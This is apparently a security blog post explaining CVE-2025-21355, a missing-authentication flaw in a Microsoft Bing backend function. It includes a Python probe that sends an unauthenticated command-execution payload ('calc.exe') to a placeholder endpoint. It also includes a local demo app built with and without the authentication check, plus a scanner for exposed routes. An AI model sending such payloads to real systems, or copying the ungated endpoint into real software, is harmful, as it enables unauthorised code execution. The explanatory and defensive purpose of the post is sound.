CVE-2025-21355 - How Missing Authentication in Microsoft Bing Puts Your Network at Risk

---

In February 2025, Microsoft published an advisory for a serious vulnerability in Microsoft Bing, tracked as CVE-2025-21355. The root cause is missing authentication on a critical Bing service function. In this post we break down what the flaw is, how a bug of this class is abused, what the potential impact is, and walk through a code example of the exploitation pattern.

What Is CVE-2025-21355?

CVE-2025-21355 is a Missing Authentication for Critical Function weakness (CWE-306) in Microsoft Bing's backend. In plain terms, a privileged code path was left open: no login, no API key, and no check that the caller is entitled to invoke that function.

Critical backend functions like this are normally gated so that only trusted principals (Bing operators or internal services) can reach them. Because the check was missing, anyone who could reach the function over the network could invoke it and act with privileges they were never granted.

How Bad Is It?

Microsoft classifies the flaw as remote code execution. No credentials, no prior access and no user interaction are needed: a remote attacker could call the exposed function, upload malicious scripts, steal data, or disrupt Bing services.

Where’s the Flaw?

Microsoft's advisory does not name the affected component or endpoint. To make the pattern concrete, this post uses a hypothetical internal endpoint, /api/admin-run-code, that accepts commands and was reachable without any authentication check.

A bug of this shape is known as an "unauthenticated critical function endpoint", catalogued as CWE-306.

Code Example: The Exploit

Here is a simplified Python script showing how an attacker would probe such an endpoint. Host and path are placeholders, not the real Bing component.
This is for educational awareness only. Do not use it against systems you are not authorised to test!

import requests

# Target URL. Both host and path are placeholders for this walkthrough;
# the advisory does not disclose the real affected component.
target_url = "https://bing.example.com/api/admin-run-code"

# Payload handed to the unprotected function - here, spawn calculator on a
# Windows host. Any command would do; that is the point of the bug.
payload = {
    "action": "exec",
    "command": "calc.exe",
}

# No session cookie, no API key, no token: the request goes out unauthenticated.
response = requests.post(target_url, json=payload, timeout=10)

if response.status_code == 200:
    # A 200 only shows the endpoint accepted the call; confirming execution
    # needs an observable side effect (callback, created file, etc.).
    print("Endpoint accepted the unauthenticated request.")
    print("Server response:", response.text)
else:
    print(f"Request rejected (HTTP {response.status_code}): patched, or the gate is in place.")

*Note*: a real attack would be more sophisticated, chaining the initial foothold into internal scripts, data stores or persistent backdoors.

How Was It Found?

Microsoft's advisory does not describe how the issue was discovered. Bugs of this class are typically found by enumerating an application's endpoints, with automated scanners such as Nuclei or hand-written fuzzing scripts, and then replaying each request with every credential stripped: no cookie, no bearer token, no API key. Any endpoint that performs a privileged action and still returns a success response is a candidate missing-authentication finding, which is then verified manually and reported to the vendor.
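To make both the bug and the way it is hunted concrete, here is an added example (my own code, not Microsoft's and not from the original post). It builds a tiny WSGI application in two configurations, one that reproduces the missing check on the hypothetical /api/admin-run-code route and one that gates it behind a bearer token, and then runs the credential-stripped sweep described above against each one in-process, with no network involved. The token value, route names and payload are constructed for the demo and do not describe the real Bing service.

```python
import hmac
import io
import json
from typing import Callable, Iterable, List, Tuple

# Constructed demo credential. A real service loads this from a secret store.
ADMIN_TOKEN = "demo-admin-token-not-real"

# Routes that perform privileged actions (hypothetical layout used in this post).
CRITICAL_ROUTES = {"/api/admin-run-code"}
PUBLIC_ROUTES = {"/api/health"}


def run_command(body: dict) -> dict:
    """Stand-in for the privileged action. It executes nothing, it just echoes."""
    return {"queued": body.get("command", "")}


def authenticated(environ: dict) -> bool:
    """Bearer-token check using a constant-time comparison."""
    scheme, _, token = environ.get("HTTP_AUTHORIZATION", "").partition(" ")
    if scheme.lower() != "bearer" or not token:
        return False
    return hmac.compare_digest(token.encode(), ADMIN_TOKEN.encode())


def make_app(require_auth: bool) -> Callable:
    """Build a WSGI app. require_auth=False reproduces the CWE-306 bug."""

    def app(environ, start_response):
        path = environ.get("PATH_INFO", "")
        method = environ.get("REQUEST_METHOD", "GET")

        def respond(status: str, payload: dict):
            start_response(status, [("Content-Type", "application/json")])
            return [json.dumps(payload).encode()]

        if path in PUBLIC_ROUTES:
            return respond("200 OK", {"ok": True})
        if path in CRITICAL_ROUTES:
            # Deny by default: the gate runs before the body is even parsed.
            if require_auth and not authenticated(environ):
                return respond("401 Unauthorized", {"error": "authentication required"})
            if method != "POST":
                return respond("405 Method Not Allowed", {"error": "POST only"})
            length = int(environ.get("CONTENT_LENGTH") or 0)
            raw = environ["wsgi.input"].read(length) if length else b"{}"
            try:
                body = json.loads(raw)
            except ValueError:
                return respond("400 Bad Request", {"error": "invalid JSON"})
            return respond("200 OK", run_command(body))
        return respond("404 Not Found", {"error": "no such route"})

    return app


def call(app, method: str, path: str, body=None, token=None) -> Tuple[int, dict]:
    """Invoke a WSGI app directly and return (status_code, parsed JSON body)."""
    raw = json.dumps(body or {}).encode()
    environ = {
        "REQUEST_METHOD": method,
        "PATH_INFO": path,
        "CONTENT_LENGTH": str(len(raw)),
        "wsgi.input": io.BytesIO(raw),
    }
    if token is not None:
        environ["HTTP_AUTHORIZATION"] = f"Bearer {token}"
    captured = {}

    def start_response(status, headers):
        captured["status"] = int(status.split(" ", 1)[0])

    chunks = app(environ, start_response)
    return captured["status"], json.loads(b"".join(chunks))


def find_unauthenticated_critical_routes(app, routes: Iterable[str]) -> List[str]:
    """The sweep: POST to each critical route with no credential at all and
    report the ones that accept the request. A hit is a lead to verify by hand,
    not proof of code execution."""
    probe = {"action": "exec", "command": "whoami"}
    return [path for path in routes if call(app, "POST", path, probe)[0] == 200]


if __name__ == "__main__":
    for name, app in (("vulnerable", make_app(False)), ("hardened", make_app(True))):
        exposed = find_unauthenticated_critical_routes(app, CRITICAL_ROUTES)
        print(f"{name}: unauthenticated critical routes = {exposed}")
```

Running the script reports /api/admin-run-code as exposed for the vulnerable configuration and nothing for the hardened one. The hardened route still works for a caller presenting the token; the fix is the gate, not removing the function.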

Original References

- Microsoft Security Response Center (MSRC) advisory for CVE-2025-21355
- BleepingComputer coverage of Bing security issues
- CVE Details entry for CVE-2025-21355 (placeholder; official reference may be updated)
- Basic primer on missing authentication vulnerabilities (CWE-306)

Mitigation

Because Bing is a hosted service, Microsoft applied the fix on its own infrastructure; there is nothing for end users to install. See the MSRC advisory above for details.

For services you run yourself, the same class of bug is prevented by:

- Authenticating and authorising every critical function, denying by default rather than trusting that a route is "internal".
- Limiting network exposure: internal APIs shouldn't be internet-facing by default.

Final Word

CVE-2025-21355 shows how a single overlooked check can open the door to serious attacks, even at a service the size of Microsoft Bing. Lesson: gate every privileged function on your backend, and keep your systems patched.

Stay safe and keep learning about software security!

Timeline

Published on: 02/19/2025 23:15:12 UTC
Last modified on: 03/12/2025 01:42:46 UTC